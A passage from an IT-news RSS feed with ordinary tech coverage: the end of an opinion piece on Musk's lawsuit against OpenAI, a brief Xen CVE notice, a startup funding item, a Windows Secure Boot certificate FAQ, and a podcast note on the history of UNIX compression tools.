<p>The founders funded OpenAI out of their own pockets as a nonprofit company aimed at developing AI for the good of the world. Then, as the technology evolved, Altman, Musk and others grew worried it might become so powerful that, without serious guardrails, it could pose a danger to humans. They feared what might happen if AI reached the level of a super-powerful <a href="https://www.computerworld.com/article/4038512/agi-explained-artificial-intelligence-with-humanlike-cognition.html">artificial general intelligence (AGI)</a> system, superior to humans on a variety of tasks, with general problem-solving skills rather than narrowly targeted ones – and the ability to think for itself rather than heeding humans. </p>



<p>In an earlier version of Musk’s suit against OpenAI and Microsoft, <a href="https://www.computerworld.com/article/1612447/elon-musks-suit-against-openai-right-idea-wrong-messenger.html">Musk put their fears this way</a>: “A.G.I. poses a grave threat to humanity — perhaps the greatest existential threat we have today.”</p>



<p>Early on, OpenAI wasn’t on many people’s radar. When Microsoft invested $1 billion in the company in 2019, few outside the tech industry took notice. Between 2021 and 2023 Microsoft invested $2 billion more, still without drawing a lot of attention.</p>



<p>Then in November 2022, OpenAI released ChatGPT, <a href="https://www.computerworld.com/article/1615637/chatgpt-finally-an-ai-chatbot-worth-talking-to.html" data-type="link" data-id="https://www.computerworld.com/article/1615637/chatgpt-finally-an-ai-chatbot-worth-talking-to.html">launching the generative AI (genAI) revolution</a> — and all the disruption that has followed since. Eventually, as it became clear how important and valuable genAI technology would become, Microsoft’s investment ballooned to $13 billion.</p>



<h2 class="wp-block-heading">Nonprofit no more</h2>



<p>OpenAI insiders were convinced several years before ChatGPT’s release that the company could become tremendously profitable. With potentially trillions of dollars at stake, in 2017 they started looking for a way to turn the nonprofit operation into a for-profit company.</p>



<p>It was at that point, OpenAI says, that Musk pushed to <a href="https://openai.com/index/openai-elon-musk/" target="_blank" rel="noreferrer noopener">gain majority equity in the company if it went public, take control of the board, and become CEO</a>. When the other founders balked, Musk withheld funding.</p>



<p>Last year, OpenAI released copies of emails he sent to it during the height of their in-fighting. In one, in February 2018, he lobbied for the creation of a for-profit arm, pointing out that, “a for-profit pivot might create a more sustainable revenue stream over time and would, with the current team, likely bring in a lot of investment.” </p>



<p>Musk then suggested that OpenAI “attach to Tesla as its cash cow.” When the other founders dismissed the idea, Musk threw a fit and quit the company. OpenAI went ahead and launched a for-profit arm, becoming a hybrid of a for-profit and nonprofit company in 2019.</p>



<p>Years later, in 2024, Musk filed suit, targeting OpenAI, Altman, OpenAI co-founder and president Greg Brockman, and Microsoft — accusing them of “stealing a charity” by creating the for-profit arm of OpenAI, and taking the $13 billion Microsoft investment. He claimed they had all illegally enriched themselves through the profit/nonprofit setup and sought $150 billion in damages. (OpenAI <a href="https://www.computerworld.com/article/3959055/openai-fears-irreparable-harm-from-musk-files-countersuit.html" data-type="link" data-id="https://www.computerworld.com/article/3959055/openai-fears-irreparable-harm-from-musk-files-countersuit.html">fired back last year with a counter suit</a>.)</p>



<p><a href="https://www.nytimes.com/2026/05/18/technology/elon-musk-lawsuit-openai-sam-altman.html" target="_blank" rel="noreferrer noopener">It took only two hours for the jury to rule against Musk</a>, though the ruling didn’t address his actual claims. Rather, the suit was thrown out because it had been filed after the statute of limitations had run out.</p>



<h2 class="wp-block-heading">Cynicism and hypocrisy win out</h2>



<p>Everyone in this case was driven by venality. Altman portrayed himself as only wanting to develop AI to help humanity — and as evidence, pointed out he has no equity in OpenAI. What he neglected to add, though, is that <a href="https://finance.yahoo.com/news/openai-chief-altman-over-2-192342692.html" target="_blank" rel="noreferrer noopener">he has more than a $2 billion stake in companies that have deals with OpenAI</a>, and stands to gain billions more if those deals grow after any IPO.</p>



<p>Microsoft, meanwhile, has used its investments in OpenAI to become a multi-trillion-dollar company. And if, as expected, <a href="https://fortune.com/2026/05/22/openai-ipo-filing-1-trillion-may-finally-answer-these-big-questions/" target="_blank" rel="noreferrer noopener">OpenAI becomes a trillion-dollar company</a> when it files its IPO later this year, Microsoft’s 27% ownership stake in the company would make it $270 million richer. That’s not a bad payoff for turning a blind eye to the way in which OpenAI performed a bait-and-switch from nonprofit to for-profit company. </p>



<p>As for Musk…, well, what can you say about someone who claims he wants to save humankind from the evils of AI, while at the same time lobbying for OpenAI to become a for-profit company and milking it like a cash cow? </p>



<p>He’s shown he’s not only the world’s wealthiest man. He’s also the world’s most hypocritical. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-8553 | XenSource Xen Kernel Memory information disclosure (SBV-58182)]]></title>
<description><![CDATA[A vulnerability was found in XenSource Xen. It has been declared as problematic. Affected is an unknown function. Executing a manipulation can lead to information disclosure  (Kernel Memory).

This vulnerability is tracked as CVE-2015-8553. The attack is restricted to local execution. No exploit ...]]></description>
<link>https://tsecurity.de/de/3549416/sicherheitsluecken/cve-2015-8553-xensource-xen-kernel-memory-information-disclosure-sbv-58182/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3549416/sicherheitsluecken/cve-2015-8553-xensource-xen-kernel-memory-information-disclosure-sbv-58182/</guid>
<pubDate>Wed, 27 May 2026 00:54:51 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/xensource:xen">XenSource Xen</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected is an unknown function. Executing a manipulation can lead to information disclosure  (Kernel Memory).

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2015-8553">CVE-2015-8553</a>. The attack is restricted to local execution. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[Amazon fulfillment competitor Stord raises $250M at $3B valuation]]></title>
<description><![CDATA[Stord was founded in 2015 by then-college students CEO Sean Henry  and CTO Jacob Boudreau while they were still at Georgia Tech.]]></description>
<link>https://tsecurity.de/de/3547859/it-nachrichten/amazon-fulfillment-competitor-stord-raises-250m-at-3b-valuation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3547859/it-nachrichten/amazon-fulfillment-competitor-stord-raises-250m-at-3b-valuation/</guid>
<pubDate>Tue, 26 May 2026 14:02:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Stord was founded in 2015 by then-college students CEO Sean Henry  and CTO Jacob Boudreau while they were still at Georgia Tech.]]></content:encoded>
</item>
<item>
<title><![CDATA[FAQ: What you need to know about expiring Windows Secure Boot certificates]]></title>
<description><![CDATA[Microsoft is preparing to make a significant change to the Secure Boot system in Windows that will impact operations for both clients and servers.



In a nutshell: The Secure Boot certificates that Microsoft issued 15 years ago are being replaced by newer ones, with the older certificates set to...]]></description>
<link>https://tsecurity.de/de/3547572/it-nachrichten/faq-what-you-need-to-know-about-expiring-windows-secure-boot-certificates/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3547572/it-nachrichten/faq-what-you-need-to-know-about-expiring-windows-secure-boot-certificates/</guid>
<pubDate>Tue, 26 May 2026 12:17:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft is preparing to make a significant change to the Secure Boot system in Windows that will impact operations for both clients and servers.</p>



<p>In a nutshell: The Secure Boot certificates that Microsoft issued 15 years ago are being replaced by newer ones, with the older certificates set to expire beginning in June. To continue to receive the most up-to-date security protections for the Windows boot-up process, individual users and IT administrators alike need to make sure their Windows devices have the new Secure Boot certificates installed.</p>



<p>Have questions? Of course you do. Here are answers to eight key questions about the Secure Boot certificate updates.</p>



<h2 class="wp-block-heading">What is Secure Boot?</h2>



<p>Secure Boot is a security feature that verifies that all firmware-based software is signed by a trusted certificate when Windows starts up. If something doesn’t match, it gets blocked. This all happens immediately on boot, before Windows or anything else loads.</p>



<p>Secure Boot is a part of the <a href="https://www.howtogeek.com/56958/htg-explains-how-uefi-will-replace-the-bios/" target="_blank" rel="noreferrer noopener">UEFI firmware standard</a>, which replaced the older BIOS model for modern PCs. It was added to UEFI in 2011 so that only trusted, signed code could run during startup.</p>



<p>Microsoft issued its original Secure Boot certificates in 2011 and introduced Secure Boot as an optional feature in Windows 8. It remained optional in Windows 10, since UEFI had not had much time to penetrate the market when Windows 10 was released in 2015. But Secure Boot became mandatory in Windows 11. Windows 11 came out in 2021, giving UEFI-powered systems plenty of time to saturate the marketplace.</p>



<h2 class="wp-block-heading">What’s happening with Windows Secure Boot certificates?</h2>



<p>To keep up with emerging threats, Microsoft in 2023 issued new Secure Boot certificates to replace the 2011 versions. Those began rolling out on Windows devices in 2024, and <a href="https://blogs.windows.com/windowsexperience/2026/02/10/refreshing-the-root-of-trust-industry-collaboration-on-secure-boot-certificate-updates/" target="_blank" rel="noreferrer noopener">according to Microsoft</a>, nearly all devices shipped in 2025 and later already include the 2023 certificates.</p>



<p>However, most older devices with Secure Boot enabled (those manufactured from 2012 to 2024) have been relying on the 2011 certificates — and those certificates begin expiring in June.</p>



<p>There are three Windows Secure Boot certificates expiring this year:</p>



<ul class="wp-block-list">
<li><strong>Microsoft Corp. KEK CA 2011:</strong> authorizes changes to the Secure Boot database</li>



<li><strong>Microsoft UEFI CA 2011:</strong> signs third-party drivers to allow hardware components to load its firmware during boot</li>



<li><strong>Microsoft Windows Production PCA 2011:</strong> signs the Windows bootloader itself, the core piece of software that loads Windows from your hard drive into memory</li>
</ul>



<p>The first two certificates will expire on June 27; the third will expire on October 19.</p>



<p>For devices that didn’t ship with the 2023 certificates pre-installed, Microsoft is now rolling out those new certificates via Windows Update.</p>



<h2 class="wp-block-heading">What happens to devices that don’t have the updated certificates after the old ones expire?</h2>



<p>Lacking the new certificates, your PC keeps working and you’ll still receive regular Windows updates, but the computer loses the ability to receive security updates for the boot process. New protections for Windows Boot Manager won’t install. Updates to the Secure Boot database won’t apply. Revocation lists that block known malicious software won’t update. Your system is essentially defenseless against emerging boot-level threats.</p>



<p>Over time, not having the current certificates may also lead to compatibility issues with newer operating systems, firmware, hardware, or Secure Boot–dependent software.</p>



<h2 class="wp-block-heading">How are Secure Boot certificates updated?</h2>



<p>For most devices that have Windows updates managed by Microsoft (this includes consumer devices and some business and education devices), the new certificates will be installed automatically via Windows Update as part of the regular monthly update process, with no additional action required. Microsoft has been gradually rolling out the new certificates since June 2025, so your device may have them already.</p>



<p>Some devices may require a separate firmware update from the device manufacturer before the system can apply the new Secure Boot certificates. That’s because the new certificates need to be written into your motherboard’s UEFI databases that Secure Boot uses during the boot process. HP, Dell, Lenovo, and other major PC manufacturers have been releasing BIOS updates specifically to ensure their systems can properly accept the new certificates.</p>



<p>Microsoft recommends that customers check their Original Equipment Manufacturer (OEM) support pages for any applicable firmware updates and install them where needed. Microsoft maintains a list of <a href="https://protect.checkpoint.com/v2/r01/___https:/support.microsoft.com/en-us/topic/original-equipment-manufacturer-oem-pages-for-secure-boot-9ecc3ba4-fb50-4bd3-9e9b-f16b35b8fb68___.YzJ1OndlY29tbXVuaWNhdGlvbnM6YzpvOjViMDQ0ZjNjYjc2MDJkYjQyZjBlNThlZDJmYjFkY2IwOjc6MWY2MDpkNWE3YjBmNjM5MjNjMjRjZmQwMGVmNDkyMzBmZjE2MGI4ODY1YzJlMmQ3ZDEzYTBlNzUwN2ZlZDBlMTMwODlmOmg6VDpG" target="_blank" rel="noreferrer noopener">OEM support pages</a> for Secure Boot update readiness.</p>



<p>Devices managed by organizations may follow different update processes and typically require IT administrator action. Microsoft has a comprehensive “<a href="https://support.microsoft.com/en-us/topic/secure-boot-certificate-updates-guidance-for-it-professionals-and-organizations-e2b43f9f-b424-42df-bc6a-8476db65ab2f" target="_blank" rel="noreferrer noopener">Secure Boot Certificate updates: Guidance for IT professionals and organizations</a>” mini-site that covers verifying Secure Boot status, preparation, firmware considerations, deployment options (including automated deployment), monitoring and remediation, troubleshooting, and more.</p>



<h2 class="wp-block-heading">Which devices will get the updated certificates automatically?</h2>



<p>Only devices running <a href="https://learn.microsoft.com/en-us/windows/release-health/supported-versions-windows-client" target="_blank" rel="noreferrer noopener">Windows versions currently supported by Microsoft</a> will get the updated Secure Boot certificates:</p>



<ul class="wp-block-list">
<li>Windows 11 24H2, 25H2, and 26H1 (all editions); Windows 11 23H2 enterprise/education editions; and Windows 11 <a href="https://www.computerworld.com/article/1716419/faq-windows-10-ltsb-explained.html">Long-Term Servicing Channel</a> (LTSC) 2024 editions</li>



<li>Windows 10 22H2 devices enrolled in the <a href="https://learn.microsoft.com/en-us/windows/whats-new/extended-security-updates" target="_blank" rel="noreferrer noopener">Extended Security Updates</a> (ESU) program; and Windows 10 LTSB/LTSC 2016, 2019, and 2021 editions until their LTSC end-of-support dates</li>



<li>Windows Server 2019, 2022, and 2025: covered with separate guidance in the <a href="https://techcommunity.microsoft.com/blog/windowsservernewsandbestpractices/windows-server-secure-boot-playbook-for-certificates-expiring-in-2026/4495789" target="_blank" rel="noreferrer noopener">Secure Boot Playbook for Windows Server</a></li>
</ul>



<p>Out-of-support Windows versions will not receive the new certificates.</p>



<p>As noted above, Microsoft-managed Windows client devices will have the new Secure Boot certificates delivered automatically through Windows Update. The new certificates will not be delivered automatically in IT-managed environments.</p>



<h2 class="wp-block-heading">How do I know if the new Secure Boot certificates have been installed?</h2>



<p>Individuals and business/education users with Microsoft-managed updates can check <em>Windows Security &gt; Device security &gt; Secure Boot</em>. Here you’ll find badges and status messages indicating whether your device is fully updated and if you need to take action. See Microsoft’s “<a href="https://support.microsoft.com/en-us/topic/secure-boot-certificate-update-status-in-the-windows-security-app-5ce39986-7dd2-4852-8c21-ef30dd04f046" target="_blank" rel="noreferrer noopener">Secure Boot certificate update status in the Windows Security app</a>” support page for details.</p>



<h2 class="wp-block-heading">What else should I know about the Secure Boot certificate updates?</h2>



<p>Because Secure Boot is rooted in platform firmware, some environments may require additional steps. This can include specialized hardware configurations, certain virtualized environments where the platform provider manages firmware behavior, or devices that depend on OEM support. Microsoft is working closely with hardware and platform partners to ensure broad compatibility and a smooth transition.</p>



<p>With the April 2026 Windows security update and upcoming monthly updates, some devices may experience one additional reboot during installation. This is the one-time restart that applies the new Boot Manager after the certificates have been written to firmware — it is expected and <a href="https://learn.microsoft.com/en-us/windows/release-health/windows-message-center#4825" target="_blank" rel="noreferrer noopener">documented</a>.</p>



<h2 class="wp-block-heading">What resources are available for help deploying and troubleshooting the new Secure Boot certificates?</h2>



<ul class="wp-block-list">
<li><a href="https://aka.ms/getsecureboot" target="_blank" rel="noreferrer noopener">aka.ms/getsecureboot</a>: the canonical hub that Microsoft is keeping current with all information and guidance around Secure Boot certificate updates</li>



<li><strong><a href="https://support.microsoft.com/en-us/topic/windows-devices-for-home-users-businesses-and-schools-with-microsoft-managed-updates-29bfd847-5855-49f1-bb94-e18497fe2315" target="_blank" rel="noreferrer noopener">Windows devices for home users, businesses, and schools with Microsoft-managed updates</a></strong>: includes a troubleshooting section for problems with BitLocker recovery or a device that won’t start up after installing the new certificates</li>



<li><a href="https://protect.checkpoint.com/v2/r01/___https:/techcommunity.microsoft.com/blog/windows-itpro-blog/secure-boot-playbook-for-certificates-expiring-in-2026/4469235___.YzJ1OndlY29tbXVuaWNhdGlvbnM6YzpvOjViMDQ0ZjNjYjc2MDJkYjQyZjBlNThlZDJmYjFkY2IwOjc6OTYzYzoyMGM1NzEwODEwZWM2MWI0NjAxZjZlMTFkYzI0MTdmYzQyOTA3NjkzYzU5Y2E3MGVjNjZiYjYwOGE3YWJjOTJmOmg6VDpG" target="_blank" rel="noreferrer noopener">Secure Boot Playbook for Windows client</a> and <a href="https://protect.checkpoint.com/v2/r01/___https:/techcommunity.microsoft.com/blog/windowsservernewsandbestpractices/windows-server-secure-boot-playbook-for-certificates-expiring-in-2026/4495789___.YzJ1OndlY29tbXVuaWNhdGlvbnM6YzpvOjViMDQ0ZjNjYjc2MDJkYjQyZjBlNThlZDJmYjFkY2IwOjc6Y2ZmZDo1NTUxNzU1ZTRhMzg4MWEyZjcwYTJhYmI4ODZiMGEwNjU4ZmU4MjY1ZTI5ZmIxYzU4Y2UyODBkNTZhMDE5NGY4Omg6VDpG" target="_blank" rel="noreferrer noopener">Secure Boot Playbook for Windows Server</a>: these guides walk IT admins through the entire planning and deployment process in self-managed environments</li>



<li><strong><a href="https://support.microsoft.com/en-us/topic/secure-boot-troubleshooting-guide-5d1bf6b4-7972-455a-a421-0184f1e1ed7d" target="_blank" rel="noreferrer noopener">Secure Boot troubleshooting guide</a></strong>: for IT admins</li>



<li><a href="https://protect.checkpoint.com/v2/r01/___https:/learn.microsoft.com/en-us/windows/deployment/windows-autopatch/monitor/secure-boot-status-report___.YzJ1OndlY29tbXVuaWNhdGlvbnM6YzpvOjViMDQ0ZjNjYjc2MDJkYjQyZjBlNThlZDJmYjFkY2IwOjc6NTQ2MTo5ZmIzNmM0YjBjNTcyODZlZWZmMDNhNTMzYWZkMTA0OGEyYTYxNzVlYjkxMDdkMzBkYzIwNjExZjEwOTZhNWJjOmg6VDpG" target="_blank" rel="noreferrer noopener">Secure Boot status report in Windows Autopatch</a>: service provided to Autopatch customers for fleet-scale monitoring at no additional cost</li>
</ul>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4647: UNIX Curio #7 - Compression]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.


This series is dedicated to exploring little-known—and occasionally useful—trinkets lurking in the dusty corners of UNIX-like operating systems.


In UNIX Curio #4 (
HPR episode 4617
), I teased the subject of file compression. Today I'm circlin...]]></description>
<link>https://tsecurity.de/de/3546580/podcasts/hpr4647-unix-curio-7-compression/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3546580/podcasts/hpr4647-unix-curio-7-compression/</guid>
<pubDate>Tue, 26 May 2026 02:02:57 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<blockquote>
This series is dedicated to exploring little-known—and occasionally useful—trinkets lurking in the dusty corners of UNIX-like operating systems.</blockquote>

<p>
In UNIX Curio #4 (<a href="https://hackerpublicradio.org/eps/hpr4617/" rel="noopener noreferrer" target="_blank">
HPR episode 4617</a>
), I teased the subject of file compression. Today I'm circling back to that.</p>

<p>
The history of data compression goes back at least to the 1970s, and in contexts outside UNIX and computers, probably even earlier. Somehow, it is refreshing to learn that humans have always struggled to have enough storage space to keep all the data they want to hang on to. One way around this limitation is to use some form of compression.</p>

<p>
I am only going to dive into <em>
lossless</em>
 compression for this episode—that is, a compression method that can be reversed and will spit out the original data bit for bit. Lossy compression methods also have their places: you might be familiar with their use for audio (such as Ogg Vorbis or MP3); it's also used for images (such as JPEG). Lossy compression allows some of the original data to be thrown away, resulting in a smaller file than is possible with lossless compression, but the intent is for the result to still sound or look "good enough" to a human observer. Also, I am going to limit my discussion to generic methods used for many types of data; while FLAC does lossless compression, it is specifically designed just for audio.</p>

<p>
I should make clear that I have never studied computer science or information theory, so this episode will not get into the science behind various types of compression algorithms and how they differ. But in general, these methods take advantage of the fact that many types of data have recurring patterns. English text mostly consists of words that often re-appear many times—source code similarly has keywords and variable names that recur. Compression is accomplished by representing a piece of data that occurs multiple times with a symbol that is shorter in length.</p>

<p>
The first compression program in the UNIX world I could find is called <code>

<a href="https://www.tuhs.org/cgi-bin/utree.pl?file=V8/usr/src/cmd/pack/pack.c" rel="noopener noreferrer" target="_blank">
pack</a>

</code>

<a href="https://www.tuhs.org/cgi-bin/utree.pl?file=V8/usr/src/cmd/pack/pack.c" rel="noopener noreferrer" target="_blank">
, from 1978</a>

<sup>
1</sup>
. It was shortly followed in 1979 by a similar program called <code>

<a href="https://www.tuhs.org/cgi-bin/utree.pl?file=2.9BSD/usr/src/ucb/compact/compact.c" rel="noopener noreferrer" target="_blank">
compact</a>

</code>

<sup>
2</sup>
. Both of these used a technique called Huffman coding, but with some differences between them. Files compressed with <code>
pack</code>
 were given a <code>
.z</code>
 extension and <code>
compact</code>
 gave filenames a <code>
.C</code>
 extension. Roughly every five or ten years after this, a new program would come along and achieve lasting popularity.</p>

<p>
There were, and still are, two opposing forces facing any new form of compression. Working in favor was the advantages it provided—first among these was achieving a better compression ratio, but performance improvements such as speed or reduced memory usage could also be compelling. The force against any new method was the fact that it was not yet widely supported—it doesn't much help to have a smaller file if the people you share it with cannot decompress it.</p>

<p>
The next major advance in compression arose out of three scientific papers: two in 1977 and 1978 by Abraham Lempel and Jacob Ziv (called LZ77 and LZ78), and one by Terry Welch in 1984 which built on LZ78. This last method is typically referred to as LZW. Our UNIX Curio for today is a <a href="https://pubs.opengroup.org/onlinepubs/009695399/utilities/compress.html" rel="noopener noreferrer" target="_blank">
program called </a>

<code>

<a href="https://pubs.opengroup.org/onlinepubs/009695399/utilities/compress.html" rel="noopener noreferrer" target="_blank">
compress</a>

</code>

<sup>
3</sup>
 that implements the LZW method. Files compressed this way are named with the extension <code>
.Z</code>
. I had always assumed that this was to honor Jacob Ziv, but now that I've researched the history, it seems more likely to be a follow-on from how files compressed by <code>
pack</code>
 were named. Since <code>
pack</code>
 did not use any of the Lempel-Ziv methods, I would guess that it used <code>
.z</code>
 because that wasn't already taken by anything else, but that's pure speculation.</p>

<p>
I do recall encountering <code>
.Z</code>
 files in the wild, but feel certain that hasn't happened in the last 25 years, maybe longer. If you need to expand one of these, <code>

<a href="https://pubs.opengroup.org/onlinepubs/009695399/utilities/uncompress.html" rel="noopener noreferrer" target="_blank">
uncompress</a>

</code>

<sup>
4</sup>
 is the program to use (<a href="https://www.gnu.org/software/gzip/manual/gzip.html" rel="noopener noreferrer" target="_blank">
GNU's </a>

<code>

<a href="https://www.gnu.org/software/gzip/manual/gzip.html" rel="noopener noreferrer" target="_blank">
gunzip</a>

</code>

<a href="https://www.gnu.org/software/gzip/manual/gzip.html" rel="noopener noreferrer" target="_blank">
 can also handle them</a>

<sup>
5</sup>
). However, there was a serious problem that arose with the LZ78 and LZW compression methods. Both of them were patented, and the owner became aggressive in seeking payment from developers and users. The <code>
compress</code>
 utility was developed within two months of the publication of Welch's 1984 paper and was included in Bell Laboratories' Eighth Edition UNIX before these shakedowns started. The paper did not disclose that a patent had been filed, and apparently Spencer Thomas and the other developers of <code>
compress</code>
 were unaware of it. The utility became popular for a while, and was even standardized by POSIX, but people moved away from LZW once the legal threats started.</p>

<p>
Another important advance came in 1991 and was called the DEFLATE compression method. It combined the un-patented LZ77 method with Huffman coding to achieve a similar level of compression as LZW (actually, often better) without the legal trouble. DEFLATE was developed for <code>
PKZIP</code>
 and was soon adopted by the GNU project's <code>
gzip</code>
 compressor. While Phil Katz (the "PK" in <code>
PKZIP</code>
) patented one way of implementing the DEFLATE method, <a href="https://tools.ietf.org/html/rfc1951" rel="noopener noreferrer" target="_blank">
it was possible to write a compressor and decompressor without infringing</a>

<sup>
6</sup>
; also, he apparently <a href="https://ethw.org/History_of_Lossless_Data_Compression_Algorithms#The_Rise_of_Deflate" rel="noopener noreferrer" target="_blank">
never tried to enforce the patent</a>

<sup>
7</sup>
.</p>

<p>
As I mentioned in UNIX Curio #4, .zip is both an archive <em>
and</em>
 a compression format. Each archive member can be compressed with one of several possible methods (or stored without compression). Unlike a <code>
tar</code>
 file where compression can be applied to the entire archive, in .zip each archive member is compressed individually. This often means a .zip file will be slightly bigger than a <code>
tar</code>
 file with the same contents compressed with <code>
gzip</code>
, because the .zip format cannot take advantage of duplication that occurs among more than one member of the archive. The vast majority of .zip files use only the DEFLATE and uncompressed storage methods and these are the only options if you want to follow the profile standardized in ISO/IEC 21320-1. Actually, since they both use DEFLATE, <code>
gzip</code>
 is able to extract a .zip file in the special case where it only holds one member compressed with that method.</p>

<p>
From the 1990s onward, people paid significant attention to avoiding patent landmines, so only methods that didn't have that problem became broadly popular. While the patents on LZ78 and LZW have since expired, I feel like their most successful legacy was in discouraging people from using those methods, leading to DEFLATE taking the popularity crown.</p>

<p>
The next step came in 1996 and 1997 with the development of <code>
bzip</code>
 and <code>
bzip2</code>
 by Julian Seward. The original method was quickly followed by <code>
bzip2</code>
, which was the version that achieved true popularity. They use the Burrows-Wheeler transform, which does not itself compress data but re-arranges it to make it more compressible; <a href="https://en.wikipedia.org/wiki/Bzip2" rel="noopener noreferrer" target="_blank">
this is combined with other techniques</a>

<sup>
8</sup>
. (At least, that's my understanding. I told you, I'm not up on information theory.) This provides a significant reduction in the compressed size of the data compared to earlier methods—however, it is slower than DEFLATE both during compression and decompression.</p>

<p>
Separate projects have developed parallel versions of <code>
gzip</code>
 and <code>
bzip2</code>
 that can take advantage of multi-processor machines, but the original utilities run single-threaded.</p>

<p>
Another five years later, in 2001, Igor Pavlov added the Lempel-Ziv-Markov chain algorithm (LZMA), an enhancement to LZ77, to his 7-Zip compression tool. This was followed a few years later by LZMA2, a container format that allowed for LZMA compression to be split between multiple threads. Broad LZMA2 support came to the UNIX world in 2009 with the <code>

<a href="https://en.wikipedia.org/wiki/XZ_Utils" rel="noopener noreferrer" target="_blank">
xz</a>

</code>

<a href="https://en.wikipedia.org/wiki/XZ_Utils" rel="noopener noreferrer" target="_blank">
 utility</a>

<sup>
9</sup>
. It offers roughly similar compression ratios to <code>
bzip2</code>
, though it can be better or worse depending on the data to be compressed. While compression generally takes even longer than <code>
bzip2</code>
, decompression is significantly faster (though still not as fast as <code>
gzip</code>
). The Linux kernel relatively quickly supported <a href="https://lwn.net/Articles/423541/" rel="noopener noreferrer" target="_blank">
booting from xz-compressed images</a>

<sup>
10</sup>
 because it was a good match for that use case—compression, the time-consuming activity, only has to be done once while the more frequent decompression during boot happens relatively fast.</p>

<p>
The last method I will cover is <a href="https://en.wikipedia.org/wiki/Zstd" rel="noopener noreferrer" target="_blank">
Zstandard</a>

<sup>
11</sup>
, often written as <code>
zstd</code>
. This came about in 2015, and is another variation on LZ77 that uses finite-state entropy (which means nothing to me, but you might understand it). It performs about as well as DEFLATE in terms of compression ratios, but is much faster both when compressing and decompressing data. I should say that these statements are true with the typical default settings—depending on the compression level selected, it can compress more slowly, but compress the data smaller. However, decompression is always speedier than DEFLATE. This makes it attractive for some uses, and it is heavily promoted by Meta/Facebook, where Yann Collet developed it. For example, shipping large amounts of actively-used data between machines in a data center can go more quickly when the size is reduced; however, if the compression and decompression steps take too long that benefit is lost. A speedy method can be valuable even if it doesn't result in the greatest reduction in size. This use case stands in contrast to, say, a compressed backup file which might only be accessed in a disaster recovery scenario or never accessed at all, making size more important than speed.</p>

<p>
Both the <code>
xz</code>
 and <code>
zstd</code>
 utilities have some built-in support for multi-threading, but the default is to run in a single thread. While <code>
xz</code>
 can use multiple threads for decompression (but only if the file was compressed in multi-thread mode), the reference <code>
zstd</code>
 utility can only use more than one thread for compression, not decompression.</p>

<p>
There are many other methods of lossless compression that have been developed over the decades, but I believe these are the ones you are most likely to encounter in the world of UNIX-like systems. This is a personal opinion, and others might choose a different set. As mentioned, it can be tough for a new method to gain popularity and 35-year-old DEFLATE is still probably the most commonly used despite not being the fastest or offering the greatest reduction in size. Even systems like FreeBSD, NetBSD, and OpenBSD that do not like to include GNU tools supported it by developing their own version of <code>
gzip</code>
 based on the permissively-licensed <code>
zlib</code>
 library.</p>

<p>
Technically, the LZW method used by the <code>
compress</code>
 utility is still standardized by POSIX, so one might expect it to have the widest support. However, aggressive patent enforcement discouraged adoption, especially by Free and Open Source Software systems—even though the patent has expired, it is still out of favor compared to DEFLATE. For this reason, I feel justified in calling it a curio.</p>

<p>
References:</p>

<ol>

<li>

<a href="https://www.tuhs.org/cgi-bin/utree.pl?file=V8/usr/src/cmd/pack/pack.c" rel="noopener noreferrer" target="_blank">
Eighth Edition UNIX pack.c</a>
 https://www.tuhs.org/cgi-bin/utree.pl?file=V8/usr/src/cmd/pack/pack.c</li>

<li>

<a href="https://www.tuhs.org/cgi-bin/utree.pl?file=2.9BSD/usr/src/ucb/compact/compact.c" rel="noopener noreferrer" target="_blank">
2.9BSD compact.c</a>
 https://www.tuhs.org/cgi-bin/utree.pl?file=2.9BSD/usr/src/ucb/compact/compact.c</li>

<li>

<a href="https://pubs.opengroup.org/onlinepubs/009695399/utilities/compress.html" rel="noopener noreferrer" target="_blank">
Compress specification</a>
 https://pubs.opengroup.org/onlinepubs/009695399/utilities/compress.html</li>

<li>

<a href="https://pubs.opengroup.org/onlinepubs/009695399/utilities/uncompress.html" rel="noopener noreferrer" target="_blank">
Uncompress specification</a>
 https://pubs.opengroup.org/onlinepubs/009695399/utilities/uncompress.html</li>

<li>

<a href="https://www.gnu.org/software/gzip/manual/gzip.html" rel="noopener noreferrer" target="_blank">
GNU Gzip manual</a>
 https://www.gnu.org/software/gzip/manual/gzip.html</li>

<li>

<a href="https://tools.ietf.org/html/rfc1951" rel="noopener noreferrer" target="_blank">
RFC 1951: DEFLATE Compressed Data Format Specification version 1.3</a>
 https://tools.ietf.org/html/rfc1951</li>

<li>

<a href="https://ethw.org/History_of_Lossless_Data_Compression_Algorithms#The_Rise_of_Deflate" rel="noopener noreferrer" target="_blank">
History of Lossless Data Compression Algorithms: The Rise of Deflate</a>
 https://ethw.org/History_of_Lossless_Data_Compression_Algorithms#The_Rise_of_Deflate</li>

<li>

<a href="https://en.wikipedia.org/wiki/Bzip2" rel="noopener noreferrer" target="_blank">
bzip2</a>
 https://en.wikipedia.org/wiki/Bzip2</li>

<li>

<a href="https://en.wikipedia.org/wiki/XZ_Utils" rel="noopener noreferrer" target="_blank">
XZ Utils</a>
 https://en.wikipedia.org/wiki/XZ_Utils</li>

<li>

<a href="https://lwn.net/Articles/423541/" rel="noopener noreferrer" target="_blank">
2.6.38 merge window part 2</a>
